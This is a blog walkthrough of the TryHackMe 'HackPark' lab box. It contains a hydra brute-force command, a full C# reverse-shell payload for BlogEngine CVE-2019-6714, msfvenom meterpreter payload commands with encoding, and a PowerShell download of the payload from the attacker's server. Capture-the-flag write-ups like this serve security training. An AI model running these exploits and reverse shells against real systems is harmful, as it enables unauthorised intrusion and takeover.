{"id":131281,"date":"2023-01-18T13:52:48","date_gmt":"2023-01-18T13:52:48","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1068923"},"modified":"2023-01-18T13:52:48","modified_gmt":"2023-01-18T13:52:48","slug":"how-i-solved-the-hackpark-walkthrough-tryhackme","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/01\/18\/how-i-solved-the-hackpark-walkthrough-tryhackme\/","title":{"rendered":"How I Solved the Hackpark Walkthrough (TryHackMe)"},"content":{"rendered":"\n<div class=\"kk-star-ratings kksr-auto kksr-align-left kksr-valign-top\" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1068923&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\\\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\\\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>\n<div class=\"kksr-stars\">\n<div class=\"kksr-stars-inactive\">\n<div class=\"kksr-star\" data-star=\"1\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"2\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"3\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"4\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"5\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"kksr-stars-active\" style=\"width: 142.5px;\">\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n<div class=\"kksr-legend\" style=\"font-size: 19.2px;\"> 5\/5 &#8211; (1 vote) <\/div>\n<\/p><\/div>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/hackpark-walkthrough-tryhackme\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FzSsY4-Qr5b8%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<h2>CHALLENGE OVERVIEW<\/h2>\n<ul>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/hackpark\" target=\"_blank\" rel=\"noreferrer noopener\">hackpark<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Medium<\/li>\n<li><strong>Target<\/strong>: <code>user<\/code> and <code>root<\/code> flags on a windows machine<\/li>\n<li><strong>Highlight<\/strong>: using <code>metasploit<\/code> to quickly and easily gain root access\u00a0<\/li>\n<li><strong>Tools<\/strong>: <code>nmap<\/code>, <code>dirb<\/code>, <code>hydra<\/code>, <code>burpsuite<\/code>, <code>msfvenom<\/code><\/li>\n<li><strong>Tags<\/strong>: RCE (remote code execution), Windows<\/li>\n<\/ul>\n<h2>BACKGROUND<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"718\" height=\"893\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-189.png\" alt=\"\" class=\"wp-image-1068966\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-189.png 718w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-189-241x300.png 241w\" sizes=\"auto, (max-width: 718px) 100vw, 718px\" \/><\/figure>\n<\/div>\n<p>In this box, we will hack into a windows machine using standard pen-testing tools. There are two options for solving the box. <\/p>\n<p>I\u2019ll demonstrate in this post how to hack into the box with <code>metasploit<\/code>. In the upcoming Hackpark Part II post, I\u2019ll show how to find the flags without using <code>metasploit<\/code>.<\/p>\n<h2>ATTACK MAP<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"521\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-182-1024x521.png\" alt=\"\" class=\"wp-image-1068933\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-182-1024x521.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-182-300x153.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-182-768x391.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-182.png 1189w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>IPs<\/p>\n<p>First, let\u2019s record our IP addresses in export format to use as bash variables.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">export myIP=10.6.2.23\nexport targetIP=10.10.72.99<\/pre>\n<h2>ENUMERATION<\/h2>\n<p>We\u2019ll kick things off with a <code>dirb<\/code> scan and an <code>nmap<\/code> scan.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/admin is discovered on targetIP with dirb. \u250c\u2500[kalisurfer@parrot]\u2500[~]\n\u2514\u2500\u2500\u257c $nmap 10.10.208.243\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2023-01-08 16:03 EST\nNmap scan report for 10.10.208.243\nHost is up (0.098s latency).\nNot shown: 998 filtered tcp ports (no-response)\nPORT STATE SERVICE\n80\/tcp open http\n3389\/tcp open ms-wbt-server\n<\/pre>\n<p>The <code>ms-wbt-server<\/code> looks interesting. A quick google search shows that this port is used for windows remote desktop. We may come back to this later on in the hack.<\/p>\n<h2>PREPPING OUR COMMAND FOR HYDRA<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-190-1024x683.png\" alt=\"\" class=\"wp-image-1068968\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-190-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-190-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-190-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-190.png 1110w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Next, we\u2019ll use firefox in developer mode to inspect the POST request when we attempt to login to the <code>\/admin<\/code> portal with generic credentials (<code>admin:pass<\/code>).<\/p>\n<pre class=\"wp-block-preformatted\"><code>__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0%2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6%2BrSLbrLQTpGUW7PNN9yu81%2BCr%2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrw%2FHc%2FbHRLj78Vg3uIgS1tBETE8yA%2FyhVkcxlv4S57ylx&amp;__EVENTVALIDATION=KzdpR5ig%2BeM9w8w06SCMiInTpqbnYjXVG%2BDsvem6bDW%2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8U%2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Q%2F0ofNG0%2FXAWpg3L4ag2J%2FxFs&amp;ctl00%24MainContent%24LoginUser%24UserName=user&amp;ctl00%24MainContent%24LoginUser%24Password=pass&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0%2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6%2BrSLbrLQTpGUW7PNN9yu81%2BCr%2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrw%2FHc%2FbHRLj78Vg3uIgS1tBETE8yA%2FyhVkcxlv4S57ylx&amp;__EVENTVALIDATION=KzdpR5ig%2BeM9w8w06SCMiInTpqbnYjXVG%2BDsvem6bDW%2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8U%2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Q%2F0ofNG0%2FXAWpg3L4ag2J%2FxFs&amp;ctl00%24MainContent%24LoginUser%24UserName=user&amp;ctl00%24MainContent%24LoginUser%24Password=pass&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in<\/code>\n<\/pre>\n<p>Next, we\u2019ll prepare our command for hydra to use to brute-force our way into the admin portal.<\/p>\n<pre class=\"wp-block-preformatted\"><code>hydra -l admin -P \/home\/kalisurfer\/hacking-tools\/rockyou.txt 10.10.72.99 http-post-form \"\/Account\/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&amp;__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&amp;ctl00%24MainContent%24LoginUser%24UserName=admin&amp;ctl00%24MainContent%24LoginUser%24Password=^PASS^&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed\"<\/code><\/pre>\n<ul>\n<li><code>-l<\/code> is for username<\/li>\n<li><code>-P<\/code> is for password wordlist\u00a0<\/li>\n<li><code>http-post-form<\/code> specifies the type of TCP request<\/li>\n<li><code>:Login<\/code> failed (at the end of the command) specifies the message response after a failed login attempt<\/li>\n<\/ul>\n<p>Results:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Hydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2023-01-08 18:02:09\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1\/p:14344398), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/10.10.208.243:80\/Account\/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&amp;__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&amp;ctl00%24MainContent%24LoginUser%24UserName=admin&amp;ctl00%24MainContent%24LoginUser%24Password=^PASS^&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed\n[STATUS] 663.00 tries\/min, 663 tries in 00:01h, 14343735 to do in 360:35h, 16 active\n[80][http-post-form] host: 10.10.208.243 login: admin password: 1qaz2wsx\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2023-01-08 18:03:43\n<\/pre>\n<h2>INITIAL FOOTHOLD<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"503\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-191-1024x503.png\" alt=\"\" class=\"wp-image-1068969\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-191-1024x503.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-191-300x147.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-191-768x377.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-191.png 1110w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Now we can log in with the <code>user:password<\/code> combo <code>admin:1qaz2wsx<\/code><\/p>\n<p>We are shown an admin dashboard. Searching up <code>blogengine<\/code> in <em>exploits-db.com<\/em> reveals a possible exploit for us to use: (<a rel=\"noreferrer noopener\" href=\"https:\/\/www.exploit-db.com\/exploits\/46353\" target=\"_blank\">CVE-2019-6714<\/a>). <\/p>\n<p>To use the exploit, we need to upload the exploit\u2019s payload (<code>PostView.ascx<\/code>) through the file manager. We can then trigger it by accessing the following address in our browser: <\/p>\n<p><em>http:\/\/10.10.172.59\/?theme=..\/..\/App_Data\/files<\/em><\/p>\n<p>And we should then be able to catch the <a href=\"https:\/\/blog.finxter.com\/python-one-line-reverse-shell\/\" data-type=\"post\" data-id=\"11536\" target=\"_blank\" rel=\"noreferrer noopener\">revshell<\/a> with a <code>netcat<\/code> listener.<\/p>\n<h2>PREPARE THE PAYLOAD<\/h2>\n<p>We need to change the IP and ports (in bold below) in the following payload, and then save it as <code>PostView.ascx<\/code><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">payload:\n&lt;%@ Control Language=\"C#\" AutoEventWireup=\"true\" EnableViewState=\"false\" Inherits=\"BlogEngine.Core.Web.Controls.PostViewBase\" %>\n&lt;%@ Import Namespace=\"BlogEngine.Core\" %> &lt;script runat=\"server\"> static System.IO.StreamWriter streamWriter; protected override void OnLoad(EventArgs e) { base.OnLoad(e); using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient(\"10.6.2.23\", 8888)) { using(System.IO.Stream stream = client.GetStream()) { using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) { streamWriter = new System.IO.StreamWriter(stream); StringBuilder strInput = new StringBuilder(); System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName = \"cmd.exe\"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } &lt;\/script>\n&lt;asp:PlaceHolder ID=\"phContent\" runat=\"server\" EnableViewState=\"false\">&lt;\/asp:PlaceHolder>\n<\/pre>\n<h2>SET UP THE NC LISTENER<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"715\" height=\"894\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-192.png\" alt=\"\" class=\"wp-image-1068971\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-192.png 715w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-192-240x300.png 240w\" sizes=\"auto, (max-width: 715px) 100vw, 715px\" \/><\/figure>\n<\/div>\n<p>Next, let\u2019s spin up a <code>netcat<\/code> listener with the command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 8888<\/pre>\n<h2>TRIGGER THE REV SHELL<\/h2>\n<p>Now that our malicious payload is uploaded and our <code>netcat<\/code> listener is activated, all we have to do is navigate to the following address, and we should catch the reverse shell as planned.\u00a0<\/p>\n<p><em>http:\/\/10.10.172.59\/?theme=..\/..\/App_Data\/files<\/em><\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"397\" height=\"230\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-183.png\" alt=\"\" class=\"wp-image-1068942\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-183.png 397w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-183-300x174.png 300w\" sizes=\"auto, (max-width: 397px) 100vw, 397px\" \/><\/figure>\n<\/div>\n<p>And \u2026 bingo! We\u2019ve caught the revshell and we are in with our initial foothold!<\/p>\n<h2>UPGRADE THE SHELL TO METERPRETER<\/h2>\n<p>Now that we are in the shell, we can work to upgrade our shell to a meterpreter shell. This will allow us to use many powerful tools within metasploit framework. <\/p>\n<p>We\u2019ll use <code>python3<\/code> to spin up a <a href=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" data-type=\"post\" data-id=\"8635\" target=\"_blank\" rel=\"noreferrer noopener\">simple HTTP server<\/a> that can help us serve the reverse meterpreter shell payload file to the windows machine.\u00a0<\/p>\n<h2>USE MSFVENOM TO CREATE REVSHELL PAYLOAD<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"684\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-193-1024x684.png\" alt=\"\" class=\"wp-image-1068973\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-193-1024x684.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-193-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-193-768x513.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-193.png 1110w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>The following command will create the payload:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f exe -o payload.exe<\/pre>\n<p>The payload did not work on my machine, so I added encoding using a standard encoder, the \u201cshikata gai nai\u201d.&nbsp;<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 --encoder x86\/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe<\/pre>\n<h2>TRANSFER THE MSFVENOM PAYLOAD TO TARGET<\/h2>\n<p>Next, we\u2019ll transfer the encoded payload from our attack machine to the target machine.\u00a0<\/p>\n<p>Let\u2019s navigate to the directory that holds the <code>payload.exe<\/code> on our attack machine. Then we\u2019ll spin up a simple HTTP server using the command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Python3 -m http.server<\/pre>\n<p>Then we\u2019ll grab the file and copy it to our target Windows machine from the HTTP server:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">powershell -c \"Invoke-WebRequest -Uri 'http:\/\/10.6.2.23:8000\/payload.exe' -OutFile 'C:\\Windows\\Temp\\winPEASx64.exe'\"<\/pre>\n<p>Notice that we save the file in the <code>Temp<\/code> directory because we have to write permissions there. This is a common configuration that can be leveraged as an unprivileged user.<\/p>\n<h2>CATCH THE METERPRETER SHELL WITH METASPLOIT<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-194-1024x683.png\" alt=\"\" class=\"wp-image-1068975\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-194-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-194-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-194-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-194.png 1110w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>First, let\u2019s fire up Metasploit console:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">msfconsole<\/pre>\n<p>Then load the handler:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">use exploit\/multi\/handler<\/pre>\n<p>Next, we need to set the <code>lport<\/code>, <code>lhost<\/code>, and set the payload to <code>windows\/meterpreter\/reverse_tcp<\/code><\/p>\n<p>Now that everything is set up correctly, we can run it to boot up the meterpreter listener:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Run<\/pre>\n<p>activate the <code>shell.exe<\/code> on the target machine to throw a meterpreter revshell<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"943\" height=\"547\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-184.png\" alt=\"\" class=\"wp-image-1068944\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-184.png 943w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-184-300x174.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-184-768x445.png 768w\" sizes=\"auto, (max-width: 943px) 100vw, 943px\" \/><\/figure>\n<\/div>\n<p>And we got it! The lower left console window shows the meterpreter shell.<\/p>\n<p>Now that we are running a meterpreter shell in <code>msfconsole<\/code> we can quickly pwn the system with:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">getsystem<\/pre>\n<p>And view the system information:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sysinfo<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"533\" height=\"359\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-185.png\" alt=\"\" class=\"wp-image-1068945\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-185.png 533w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-185-300x202.png 300w\" sizes=\"auto, (max-width: 533px) 100vw, 533px\" \/><\/figure>\n<\/div>\n<p>We can view our user information with the command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">getuid<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"468\" height=\"71\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-186.png\" alt=\"\" class=\"wp-image-1068947\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-186.png 468w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-186-300x46.png 300w\" sizes=\"auto, (max-width: 468px) 100vw, 468px\" \/><\/figure>\n<\/div>\n<p>Since we are already NT Authority, thanks to the magical powers of Metasploit, we don\u2019t need to do anything else except locate and retrieve the two flags.<\/p>\n<p>We found both flags!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"518\" height=\"378\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-187.png\" alt=\"\" class=\"wp-image-1068948\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-187.png 518w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-187-300x219.png 300w\" sizes=\"auto, (max-width: 518px) 100vw, 518px\" \/><\/figure>\n<\/div>\n<p>In the next post, I\u2019ll walk you through an alternate 